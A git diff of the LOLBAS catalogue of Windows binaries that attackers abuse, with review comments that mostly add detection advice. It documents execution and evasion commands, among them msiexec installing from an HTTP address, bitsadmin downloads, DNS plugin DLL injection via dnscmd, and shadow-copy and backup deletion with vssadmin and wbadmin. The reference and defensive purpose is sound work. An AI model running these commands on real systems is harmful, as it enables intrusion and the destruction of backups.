Merge branch 'master' into master
|
@ -3,9 +3,8 @@ Kd.exe Debugger
|
|||
Certreq.exe Exfiltrate data
|
||||
Dbghost.exe
|
||||
Robocopy.exe Needs examples
|
||||
Bitsadmin.exe bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
|
||||
Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
|
||||
notepad.exe Gui - Download files using Open (A lot of other programs as well)
|
||||
notepad.exe Gui - Download files using Open (A lot of other programs as well) LOLGuiBins?
|
||||
wbadmin.exe wbadmin delete catalog -quiet
|
||||
psexec.exe Remote execution of code
|
||||
java.exe -agentpath:<dllname_with_dll_extension> or -agentlib:<dllname>
|
||||
|
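Review bot: the Vssadmin.exe (`Delete Shadows /All /Quiet`) and wbadmin.exe (`delete catalog -quiet`) rows are destructive impact actions rather than the execute/download/bypass categories the README's candidate definition lists; either add an explicit category for them or keep them out of the todo so the lists do not drift into documenting impact commands. psexec.exe is a Sysinternals download, not an inbox binary, so if it stays it belongs with the other Microsoft (non-OS) binaries. The two notepad.exe rows are identical apart from the "LOLGuiBins?" tag; keep one.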
@ -14,5 +13,6 @@ odbcad32.exe GUI DLL Loading
|
|||
WseClientSvc.exe - https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f
|
||||
dvdplay.exe http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
|
||||
http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
|
||||
|
||||
|
||||
https://twitter.com/Hexacorn/status/993498264497541120
|
||||
https://twitter.com/Hexacorn/status/994000792628719618
|
||||
https://github.com/MoooKitty/Code-Execution
|
||||
|
|
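Review bot: four rows here are bare URLs with no binary name (the hexacorn pass-thru-command-execution category link, the two Hexacorn tweets and the MoooKitty repository), so nobody can tell which candidate each one is evidence for; prefix each with the binary it documents, as the WseClientSvc.exe and dvdplay.exe rows already do. The two empty rows above the tweets look like leftover blank table cells and can be dropped.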
13
LOLBins.md
|
@ -1,11 +1,13 @@
|
|||
# LOLBins - Living Off The Land Binaries
|
||||
Please contribute and do point out errors or resources I have forgotten.
|
||||
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
|
||||
|
||||
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLBin.png" height="150">
|
||||
|
||||
# OS BINARIES
|
||||
[Atbroker.exe](OSBinaries/Atbroker.md)
|
||||
[Appvlp.exe](OSBinaries/Appvlp.md)
|
||||
[Bash.exe](OSBinaries/Bash.md)
|
||||
[Bitsadmin.exe](OSBinaries/Bitsadmin.md)
|
||||
[Certutil.exe](OSBinaries/Certutil.md)
|
||||
[Cmdkey.exe](OSBinaries/Cmdkey.md)
|
||||
[Cmstp.exe](OSBinaries/Cmstp.md)
|
||||
|
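Review bot: the new [Appvlp.exe] entry is inserted after [Atbroker.exe], which breaks the alphabetical order the rest of the OS BINARIES list follows (Bash, Bitsadmin, Certutil, Cmdkey, ...); move it above Atbroker so the list stays scannable.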
@ -14,6 +16,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
[Cscript.exe](OSBinaries/Cscript.md)
|
||||
[Dfsvc.exe](OSBinaries/Dfsvc.md)
|
||||
[Diskshadow.exe](OSBinaries/Diskshadow.md)
|
||||
[Dnscmd.exe](OSBinaries/Dnscmd.md)
|
||||
[Esentutl.exe](OSBinaries/Esentutl.md)
|
||||
[Extexport.exe](OSBinaries/Extexport.md)
|
||||
[Extrac32.exe](OSBinaries/Extrac32.md)
|
||||
|
@ -44,11 +47,10 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
[Presentationhost.exe](OSBinaries/Presentationhost.md)
|
||||
[Print.exe](OSBinaries/Print.md)
|
||||
[Psr.exe](OSBinaries/Psr.md)
|
||||
[Qprocess.exe](OSBinaries/Qprocess.md)
|
||||
[Reg.exe](OSBinaries/Reg.md)
|
||||
[Regedit.exe](OSBinaries/Regedit.md)
|
||||
[Regasm.exe](OSBinaries/Regasm.md)
|
||||
[Regini.exe](OSBinaries/Regini.md)
|
||||
[Register-cimprovider.exe](OSBinaries/Register-cimprovider.md)
|
||||
[Regsvcs.exe](OSBinaries/Regsvcs.md)
|
||||
[Regsvr32.exe](OSBinaries/Regsvr32.md)
|
||||
[Replace.exe](OSBinaries/Replace.md)
|
||||
|
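Review bot: this hunk still shows [Qprocess.exe](OSBinaries/Qprocess.md) and [Regini.exe](OSBinaries/Regini.md) while the same commit deletes both OSBinaries/Qprocess.md and OSBinaries/Regini.md (the `@ -1,31 +0,0 @@` and `@ -1,30 +0,0 @@` hunks further down). The 11-to-10 line count suggests those two index lines are the ones being removed here, with [Register-cimprovider.exe] added; confirm that, otherwise the index will link to files that no longer exist.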
@ -60,6 +62,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
[Sc.exe](OSBinaries/Sc.md)
|
||||
[Scriptrunner.exe](OSBinaries/Scriptrunner.md)
|
||||
[Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)
|
||||
[Wab.exe](OSBinaries/Wab.md)
|
||||
[Wmic.exe](OSBinaries/Wmic.md)
|
||||
[Wscript.exe](OSBinaries/Wscript.md)
|
||||
[Xwizard.exe](OSBinaries/Xwizard.md)
|
||||
|
@ -72,18 +75,20 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
[Cdb.exe](OtherMSBinaries/Cdb.md)
|
||||
[Csi.exe](OtherMSBinaries/Csi.md)
|
||||
[Dnx.exe](OtherMSBinaries/Dnx.md)
|
||||
[Dxcap.exe](OtherMSBinaries/Dxcap.md)
|
||||
[Mftrace.exe](OtherMSBinaries/Mftrace.md)
|
||||
[Msxsl.exe](OtherMSBinaries/Msxsl.md)
|
||||
[Rcsi.exe](OtherMSBinaries/Rcsi.md)
|
||||
[Sqldumper.exe](OtherMSBinaries/Sqldumper.md)
|
||||
[Sqlps.exe](OtherMSBinaries/Sqlps.md)
|
||||
[SQLToolsPS.exe](OtherMSBinaries/SQLToolsPS.md)
|
||||
[Sqltoolsps.exe](OtherMSBinaries/Sqltoolsps.md)
|
||||
[Te.exe](OtherMSBinaries/Te.md)
|
||||
[Tracker.exe](OtherMSBinaries/Tracker.md)
|
||||
[Vsjitdebugger.exe](OtherMSBinaries/Vsjitdebugger.md)
|
||||
[Winword.exe](OtherMSBinaries/Winword.md)
|
||||
|
||||
|
||||
|
||||
# OTHER NON MICROSOFT BINARIES
|
||||
[Nvuhda6.exe](OtherBinaries/Nvuhda6.md)
|
||||
[Nvudisp.exe](OtherBinaries/Nvudisp.md)
|
||||
|
|
|
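Review bot: [SQLToolsPS.exe](OtherMSBinaries/SQLToolsPS.md) and [Sqltoolsps.exe](OtherMSBinaries/Sqltoolsps.md) list the same binary twice with different casing, and on a case-sensitive checkout the two links resolve to two different files; keep one entry and one .md file, and make the link casing match the file on disk.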
@ -1,7 +1,7 @@
|
|||
# LOLLibs - Living Off The Land Libraries
|
||||
Please contribute and do point out errors or resources I have forgotten.
|
||||
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
|
||||
|
||||
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLLib.png" height="150">
|
||||
|
||||
# OS LIBRARIES
|
||||
[Advpack.dll](OSLibraries/Advpack.md)
|
||||
|
|
|
@ -1,14 +1,23 @@
|
|||
# LOLScripts - Living Off The Land Scripts
|
||||
Please contribute and do point out errors or resources I have forgotten.
|
||||
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
|
||||
|
||||
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLScript.png" height="150">
|
||||
|
||||
# OS SCRIPTS
|
||||
|
||||
[Cl_invocation.ps1](OSScrits/Cl_invocation.md)
|
||||
[CL_mutexverifiers.ps1](OSScripts/CL_mutexverifiers.md)
|
||||
[Manage-bde.vbs](OSScripts/Manage-bde.md)
|
||||
[pester.bat](OSScripts/pester.md)
|
||||
[Pubprn.vbs](OSScripts/Pubprn.md)
|
||||
[Slmgr.vbs](OSScripts/Slmgr.md)
|
||||
[Syncappvpublishingserver.vbs](OSScripts/Syncappvpublishingserver.md)
|
||||
[Winrm.vbs](OSScripts/Winrm.md)
|
||||
|
||||
|
||||
|
||||
# OTHER MICROSOFT SIGNED SCRIPTS
|
||||
|
||||
|
||||
|
||||
# OTHER NON MICROSOFT BINARIES
|
||||
[Testxlst.js](OtherScripts/Testxlst.md)
|
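Review bot: the link target `OSScrits/Cl_invocation.md` is misspelled (every other entry uses `OSScripts`), so that link is dead as committed. The last heading reads "# OTHER NON MICROSOFT BINARIES" but this is the scripts list and its only entry is Testxlst.js; rename it to match "# OS SCRIPTS" and "# OTHER MICROSOFT SIGNED SCRIPTS". That latter heading has no entries yet, so either drop it until there is one or add a placeholder line so it does not look like a rendering error.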
|
@ -0,0 +1,35 @@
|
|||
## Appvlp.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
AppVLP.exe \\webdav\calc.bat
|
||||
|
||||
AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe', '', '', 'open', 1)"
|
||||
|
||||
AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Will - @moo_hax
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://github.com/MoooKitty/Code-Execution
|
||||
* https://twitter.com/moo_hax/status/892388990686347264
|
||||
|
||||
Full path:
|
||||
```
|
||||
"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe"
|
||||
```
|
||||
|
||||
Notes:
|
||||
Used by App-V
|
||||
|
||||
|
||||
Detection:
|
||||
Appvlp.exe spawning other process
|
||||
|
||||
|
|
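Review bot: the Detection line "Appvlp.exe spawning other process" is the right signal but should say what a defender matches on: a process-creation event (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled) whose parent image is AppVLP.exe, since every example here has AppVLP.exe launching powershell.exe or a file from a UNC/WebDAV path. "Code sample:" is rendered as an empty bullet; write "None" as the pester.bat entry in this commit does, so the template field does not show as a blank list item.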
@ -0,0 +1,47 @@
|
|||
## Bitsadmin.exe
|
||||
|
||||
* Functions: Execute, Download, Copy, Read ADS
|
||||
|
||||
```
|
||||
bitsadmin /create 1
|
||||
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe
|
||||
bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL
|
||||
bitsadmin /RESUME 1
|
||||
bitsadmin /complete 1
|
||||
|
||||
bitsadmin /create 1
|
||||
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
|
||||
bitsadmin /RESUME 1
|
||||
bitsadmin /complete 1
|
||||
|
||||
|
||||
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
|
||||
|
||||
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Rob Fuller - @mubix
|
||||
* Chris Gates - @carnal0wnage
|
||||
* Oddvar Moe - @oddvarmoe
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Slide 53
|
||||
* https://www.youtube.com/watch?v=_8xJaaQlpBo
|
||||
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\bitsadmin.exe
|
||||
c:\windows\sysWOW64\bitsadmin.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
|
||||
Detection:
|
||||
|
||||
|
|
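Review bot: Notes and Detection are both empty even though the examples hand a defender concrete artifacts: a bitsadmin.exe command line containing /addfile with an http(s) source, /SetNotifyCmdLine, or a destination carrying an alternate data stream such as `1.txt:cmd.exe`. Add those to Detection, and note that BITS jobs also leave records in the Microsoft-Windows-Bits-Client/Operational event log and are visible in `bitsadmin /list /allusers` output, which is where a job persists after the bitsadmin.exe process has exited. The two `&`-chained one-liners at the bottom repeat the multi-line examples above them and can be folded into a single sentence saying the steps can be chained.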
@ -0,0 +1,37 @@
|
|||
## Dnscmd.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Shay Ber - ?
|
||||
* Dimitrios Slamaris - @dim0x69
|
||||
* Nikhil SamratAshok Mittal - @nikhil_mitt
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
|
||||
* https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
|
||||
* https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
|
||||
* https://twitter.com/Hexacorn/status/994000792628719618
|
||||
* http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\Dnscmd.exe
|
||||
c:\windows\sysWOW64\Dnscmd.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
Used on Windows servers for DNS management
|
||||
|
||||
|
||||
Detection:
|
||||
|
||||
|
||||
|
|
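Review bot: Detection is empty, but the mechanism is well defined: `/config /serverlevelplugindll` writes the ServerLevelPluginDll value under `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters` on the target DNS server, and the DLL is loaded when the DNS service next starts. So the telemetry lives on the DNS server (a registry value-set event on that value, a dns.exe image load from a UNC or non-system path, a DNS service restart), not on the host that ran dnscmd.exe. The Notes line should also say the command requires DnsAdmins (or equivalent) rights on the server, which the linked "abusing dnsadmins privilege" resource covers. "Shay Ber - ?" leaves a placeholder handle; fill it in or drop the dash.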
@ -1,15 +1,18 @@
|
|||
## Extrac32.exe
|
||||
|
||||
* Functions: Add ADS
|
||||
* Functions: Add ADS, Download
|
||||
|
||||
```
|
||||
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
||||
|
||||
extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
|
||||
|
||||
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Oddvar Moe - @oddvarmoe
|
||||
* egre55 - @egre55
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
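Review bot: the third example (`/Y /C \\webdavserver\share\test.txt C:\folder\test.txt`) is a plain copy from a WebDAV share and is what justifies the new "Download" function, while the first two write into an alternate data stream; the Detection section (outside this hunk) should therefore list both a UNC source argument and a `:` in the destination path as the things to match on.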
@ -17,6 +20,7 @@ Code sample:
|
|||
Resources:
|
||||
* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
* https://twitter.com/egre55/status/985994639202283520
|
||||
|
||||
Full path:
|
||||
```
|
||||
|
|
|
@ -1,11 +1,15 @@
|
|||
## hh.exe
|
||||
|
||||
* Functions: Open Explorer
|
||||
* Functions: Download, Execute
|
||||
|
||||
```
|
||||
HH.exe http://www.google.com
|
||||
|
||||
HH.exe C:\
|
||||
|
||||
HH.exe c:\windows\system32\calc.exe
|
||||
|
||||
HH.exe http://some.url/script.ps1
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
|
|
|
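Review bot: the Functions line changes from "Open Explorer" to "Download, Execute", but of the four examples only `HH.exe c:\windows\system32\calc.exe` shows execution, and `HH.exe http://some.url/script.ps1` shows a fetch without saying where the content ends up, so the new claim is not documented. Add a Notes line stating what hh.exe does with a URL argument and where the fetched file is written, since that is the artifact a Detection section would need, and keep "Open Explorer" (the `HH.exe C:\` example) alongside the new functions rather than replacing it.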
@ -4,17 +4,24 @@
|
|||
|
||||
```
|
||||
msiexec /quiet /i cmd.msi
|
||||
|
||||
msiexec /q /i http://192.168.100.3/tmp/cmd.png
|
||||
|
||||
msiexec /y "C:\folder\evil.dll"
|
||||
|
||||
msiexec /z "C:\folder\evil.dll"
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* ? - @netbiosX
|
||||
* PhilipTsukerman - @PhilipTsukerman
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
|
||||
* https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||
|
||||
Full path:
|
||||
```
|
||||
|
|
|
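Review bot: the `/y` and `/z` examples rely on behaviour the page never explains: msiexec `/y` calls the DllRegisterServer export of the given DLL and `/z` calls DllUnregisterServer, so both load and run DLL code without any .msi package; put that in Notes so the reader understands why a .dll argument to msiexec matters. For Detection, the distinguishing features in these examples are msiexec.exe with `/i` pointing at an http URL, an install source without an .msi extension (cmd.png), and `/y` or `/z` with a DLL outside Program Files; Windows Installer events from the MsiInstaller source in the Application log cover the `/i` cases. The acknowledgement "? - @netbiosX" still has a placeholder name.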
@ -1,31 +0,0 @@
|
|||
## Qprocess.exe
|
||||
|
||||
* Functions: Credentials
|
||||
|
||||
```
|
||||
qprocess /SERVER:RemoteServer
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Rahmat Nurfauzi - @infosecn1nja
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/infosecn1nja/status/987268926139592706
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\Qprocess.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
Some specific details about the binary file.
|
||||
|
||||
|
||||
Detection:
|
||||
Details about detection.
|
||||
IOC, Behaviour , User Agents etc
|
||||
|
||||
|
|
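Review bot: Qprocess.md is deleted outright, but the merge commit message says nothing about why. If the reason is that a "Credentials" function does not fit the README's candidate definition, record that in the commit or in the todo so the acknowledgement to @infosecn1nja and the linked tweet are not silently lost. The untouched template text still in the file ("Some specific details about the binary file.", "Details about detection.", "IOC, Behaviour , User Agents etc") shows it was never filled in, which may be the actual reason; say so.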
@ -1,30 +0,0 @@
|
|||
## Regini.exe
|
||||
|
||||
* Functions: Credentials
|
||||
|
||||
```
|
||||
regini -m \\RemoteServer Example
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Osanda Malith - @OsandaMalith
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/OsandaMalith/status/987823644402372608
|
||||
* https://ss64.com/nt/regini.html
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\regini.exe
|
||||
c:\windows\sysWOW64\regini.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
Can also be used to add registry keys
|
||||
|
||||
Detection:
|
||||
|
||||
|
|
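Review bot: same as Qprocess.md, Regini.md is removed with no stated reason, and unlike that file this one had real content (the `-m \\RemoteServer` usage, the "Can also be used to add registry keys" note and two resources). If the "Credentials" function is being dropped as out of scope, say so in the commit message; if the entry is being moved, the new location should land in the same commit.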
@ -0,0 +1,30 @@
|
|||
## Register-cimprovider.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
Register-cimprovider -path "C:\folder\evil.dll"
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* PhilipTsukerman - @PhilipTsukerman
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\Register-cimprovider.exe
|
||||
c:\windows\sysWOW64\Register-cimprovider.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
|
||||
|
||||
Detection:
|
||||
|
||||
|
|
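Review bot: Notes and Detection are empty for a new entry whose whole point is that `Register-cimprovider -path` loads the named DLL into the Register-cimprovider.exe process (the same tweet is cited for the msiexec `/y` technique elsewhere in this commit). Suggested Notes: "Registers a CIM/WMI provider; the DLL given by -path is loaded by the process." Suggested Detection: an image-load event (Sysmon Event ID 7) for Register-cimprovider.exe where the loaded module is outside %SystemRoot%, plus a `-path` argument in the process command line.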
@ -4,6 +4,8 @@
|
|||
|
||||
```
|
||||
Scriptrunner.exe -appvscript calc.exe
|
||||
|
||||
ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
|
@ -15,6 +17,7 @@ Code sample:
|
|||
Resources:
|
||||
* https://twitter.com/KyleHanslovan/status/914800377580503040
|
||||
* https://twitter.com/NickTyrer/status/914234924655312896
|
||||
* https://github.com/MoooKitty/Code-Execution
|
||||
|
||||
Full path:
|
||||
```
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
## Wab.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
Wab.exe (requires registry changes)
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Adam - @Hexacorn
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
|
||||
* https://twitter.com/Hexacorn/status/991447379864932352
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Program Files\Windows Mail\wab.exe
|
||||
C:\Program Files (x86)\Windows Mail\wab.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
Searches for wab.dll. Can be manipulated with the following registry key:
|
||||
```
|
||||
HKLM\Software\Microsoft\WAB\DLLPath
|
||||
```
|
||||
|
||||
Binary is used to manage Windows contacts/wab files. (Legacy)
|
||||
|
||||
|
||||
Detection:
|
||||
Look for registry changes to HKLM\Software\Microsoft\WAB\DLLPath
|
||||
|
||||
|
||||
|
|
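Review bot: the usage fence contains `Wab.exe (requires registry changes)`, which is prose rather than a command; the actual step is the HKLM\Software\Microsoft\WAB\DLLPath change already described under Notes, so move that sentence out of the fence or have it point at Notes. Detection can be made concrete: a registry value-set event (Sysmon Event ID 13) on `HKLM\Software\Microsoft\WAB\DLLPath`, and wab.exe loading a wab.dll from anywhere other than the Windows Mail folders listed under Full path.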
@ -0,0 +1,107 @@
|
|||
## pester.bat
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
# Execute notepad
|
||||
Pester.bat /help "$null; notepad"
|
||||
# Execute calc
|
||||
Pester.bat /help "$null; calc"
|
||||
# Execute Get-Process cmdlet
|
||||
Pester.bat /help "$null; ps"
|
||||
|
||||
# Other options for 2nd parameter
|
||||
pester.bat help "$null; notepad"
|
||||
pester.bat /help "$null; notepad"
|
||||
pester.bat ? "$null; notepad"
|
||||
pester.bat -? "$null; notepad"
|
||||
pester.bat /? "$null; notepad"
|
||||
|
||||
# 3rd parameter can be anything
|
||||
pester.bat /help "'doesnotexist'; notepad"
|
||||
pester.bat /help "Get-Help; notepad"
|
||||
pester.bat /help "gcm;notepad"
|
||||
|
||||
# 4th parameter is the payload
|
||||
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Emin Atac - @p0w3rsh3ll
|
||||
|
||||
Code sample:
|
||||
None
|
||||
|
||||
Resources:
|
||||
None
|
||||
|
||||
Full path:
|
||||
```powershell
|
||||
# Shipped inbox
|
||||
"c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat"
|
||||
|
||||
# There can be other versions present as well
|
||||
Dir "c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat"
|
||||
```
|
||||
|
||||
Notes: This file is digitally signed by a Microsoft certificate
|
||||
```powershell
|
||||
|
||||
Get-FileHash "C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat"
|
||||
|
||||
|
||||
Algorithm Hash Path
|
||||
--------- ---- ----
|
||||
SHA256 EB83A9D837CFE2F409CA3839B017E307A7A65782CB6A0AE0C50731C244DAD40E C:\Program Files\WindowsPower...
|
||||
|
||||
|
||||
Get-AuthenticodeSignature "C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" | fl
|
||||
|
||||
|
||||
SignerCertificate : [Subject]
|
||||
CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
|
||||
|
||||
[Issuer]
|
||||
CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington,
|
||||
C=US
|
||||
|
||||
[Serial Number]
|
||||
33000001733031072665B8B9B3000000000173
|
||||
|
||||
[Not Before]
|
||||
11/08/2017 22:23:35
|
||||
|
||||
[Not After]
|
||||
11/08/2018 22:23:35
|
||||
|
||||
[Thumbprint]
|
||||
14590DC5C3AAF238FCFD7785B4B93F4071402C34
|
||||
|
||||
TimeStamperCertificate : [Subject]
|
||||
CN=Microsoft Time-Stamp Service, OU=nCipher DSE ESN:12E7-3064-6112, OU=AOC, O=Microsoft
|
||||
Corporation, L=Redmond, S=Washington, C=US
|
||||
|
||||
[Issuer]
|
||||
CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
|
||||
|
||||
[Serial Number]
|
||||
33000000AC8A21BC7AD29B72F40000000000AC
|
||||
|
||||
[Not Before]
|
||||
07/09/2016 19:56:54
|
||||
|
||||
[Not After]
|
||||
07/09/2018 19:56:54
|
||||
|
||||
[Thumbprint]
|
||||
3970258B14C879DD5F0C5DE98B9CB39499F71CB7
|
||||
|
||||
Status : Valid
|
||||
StatusMessage : Signature verified.
|
||||
Path : C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
|
||||
SignatureType : Catalog
|
||||
IsOSBinary : True
|
||||
```
|
||||
|
||||
|
||||
|
|
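Review bot: "# 4th parameter is the payload" is a dangling comment with nothing after it; either delete it or finish the sentence, because as committed the fence ends on an unexplained line. The usage fence mixes `#` comment lines with batch invocations and carries no language tag, while the Full path and Notes fences are tagged `powershell`; tag them consistently. The entry also has no Detection section, unlike the other new files in this commit: the useful signal is that Pester.bat ends up starting powershell.exe, so a cmd.exe child powershell.exe whose command line contains the quoted help string and a `;`-chained command is the observable, and the `Get-AuthenticodeSignature` output (IsOSBinary : True, SignatureType : Catalog) is worth keeping as the reason signature-based allow-listing alone will not block it.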
@ -0,0 +1,31 @@
|
|||
## Dxcap.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
Dxcap.exe -c C:\Windows\System32\notepad.exe
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Matt harr0ey - @harr0ey
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/harr0ey/status/992008180904419328
|
||||
|
||||
Full path:
|
||||
```
|
||||
?
|
||||
```
|
||||
|
||||
Notes:
|
||||
This file is a part of Visual studio.
|
||||
https://msdn.microsoft.com/en-us/library/dn774939.aspx
|
||||
|
||||
|
||||
Detection:
|
||||
|
||||
|
||||
|
|
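Review bot: Full path is a literal `?`; since Notes already says the file ships with Visual Studio and links the MSDN page, either resolve the path from such an install or write "Unknown" so the placeholder is not mistaken for a value. Detection is empty; the `-c` example launches the given executable as a child, so a process-creation event with Dxcap.exe as the parent image is the natural entry. "Matt harr0ey" mixes a name with a handle; check the spelling.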
@ -22,10 +22,12 @@ Resources:
|
|||
Full path:
|
||||
```
|
||||
C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
|
||||
|
||||
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
Part of SQL server, but also Office in some versions.
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
## testxlst.js
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||
|
||||
wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Jimmy - @bohops
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/bohops/status/993314069116485632
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\python27amd64\Lib\site-packages\win32com\test
|
||||
```
|
||||
|
||||
Notes:
|
||||
Part of Pywin32
|
||||
https://github.com/mhammond/pywin32
|
||||
|
||||
Detection:
|
||||
|
||||
|
||||
|
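Review bot: the Full path `c:\python27amd64\Lib\site-packages\win32com\test` is a directory, not the script; append the file name. The LOLScripts.md index links this as `Testxlst.js` under a heading that says BINARIES while the heading here is `## testxlst.js`; align casing and section name, and verify the spelling ("xlst" vs "xslt") against the pywin32 repository linked under Notes. Notes should say what the three arguments are (an XML input, the stylesheet given as the .xls argument, and an output file) so the reader sees the execution primitive is the transform. Detection is empty: cscript.exe or wscript.exe running a .js from a site-packages path with .xml and stylesheet arguments is the observable.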
73
README.md
|
@ -1,16 +1,81 @@
|
